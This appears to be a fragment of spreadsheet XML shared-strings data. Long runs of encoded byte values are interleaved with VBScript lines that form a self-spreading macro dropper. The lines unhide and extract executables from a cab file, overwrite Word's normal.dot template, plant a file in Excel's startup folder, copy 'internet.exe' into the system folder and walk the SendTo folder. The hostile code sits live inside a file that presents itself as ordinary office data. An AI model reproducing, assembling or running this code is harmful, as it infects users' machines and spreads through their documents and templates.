107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 